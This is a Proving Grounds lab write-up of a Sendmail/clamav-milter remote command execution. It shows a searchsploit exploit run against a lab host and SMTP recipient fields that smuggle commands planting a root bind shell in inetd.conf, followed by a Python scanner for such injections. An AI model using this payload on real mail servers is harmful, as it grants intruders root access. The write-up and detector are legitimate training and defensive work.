OffSec Proving Grounds

Foothold

ClamAV-Milter-Sendmail-0.91.2-Remote-Code-Execution/exploit.c at main · 0x1sac/ClamAV-Milter-Sendmail-0.91.2-Remote-Code-Execution (GitHub)

Opted for another exploit


Last updated 1 year ago

$ sudo tcpdump -i tun0 icmp
$ searchsploit -m 4761           
  Exploit: Sendmail with clamav-milter < 0.91.2 - Remote Command Execution
      URL: https://www.exploit-db.com/exploits/4761
     Path: /usr/share/exploitdb/exploits/multiple/remote/4761.pl
    Codes: CVE-2007-4560
 Verified: True
File Type: ASCII text
Copied to: /home/adot/oscp/pg/clamav/4761.pl
$ perl 4761.pl 192.168.166.42
Sendmail w/ clamav-milter Remote Root Exploit
Copyright (C) 2007 Eliteboy
Attacking 192.168.166.42...
220 localhost.localdomain ESMTP Sendmail 8.13.4/8.13.4/Debian-3sarge3; Fri, 16 Aug 2024 03:40:58 -0400; (No UCE/UBE) logging access from: [192.168.45.204](FAIL)-[192.168.45.204]
250-localhost.localdomain Hello [192.168.45.204], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-EXPN
250-VERB
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-DELIVERBY
250 HELP
250 2.1.0 <>... Sender ok
250 2.1.5 <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf">... Recipient ok
250 2.1.5 <nobody+"|/etc/init.d/inetd restart">... Recipient ok
354 Enter mail, end with "." on a line by itself
250 2.0.0 47G7ewaf004758 Message accepted for delivery
221 2.0.0 localhost.localdomain closing connection
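
Detection side of the transcript above, as an added example that is not part of the original writeup: a small scanner that flags SMTP recipient lines whose address carries shell syntax, which is what the two "Recipient ok" replies show. It assumes the defender has SMTP session replies in the format seen above; the last sample line is constructed, and `|` is legal in a local part, so this is a heuristic.

```python
# Added example: flag SMTP lines whose <address> contains shell syntax.
# SHELL_MARKERS, extract_address and scan are names chosen for this example.

SHELL_MARKERS = {
    "|": "pipe",
    "`": "backtick",
    "$(": "command substitution",
    ";": "command separator",
}

def extract_address(line):
    """Return the text between the first '<' and the last '>', or None."""
    start, end = line.find("<"), line.rfind(">")
    return line[start + 1:end] if 0 <= start < end else None

def scan(lines):
    """Return (line_number, address, reasons) for every suspicious address."""
    findings = []
    for number, line in enumerate(lines, start=1):
        addr = extract_address(line)
        if not addr:          # no address on this line, or the null sender <>
            continue
        reasons = [name for marker, name in SHELL_MARKERS.items() if marker in addr]
        if any(ch.isspace() for ch in addr):
            reasons.append("whitespace")
        if reasons:
            findings.append((number, addr, reasons))
    return findings

# First three lines are taken from the transcript above; the last is a
# constructed benign recipient for contrast.
SAMPLE = """\
250 2.1.0 <>... Sender ok
250 2.1.5 <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf">... Recipient ok
250 2.1.5 <nobody+"|/etc/init.d/inetd restart">... Recipient ok
250 2.1.5 <alice@example.com>... Recipient ok
""".splitlines()

if __name__ == "__main__":
    for number, addr, reasons in scan(SAMPLE):
        print(f"line {number}: {', '.join(reasons)} in recipient {addr!r}")
```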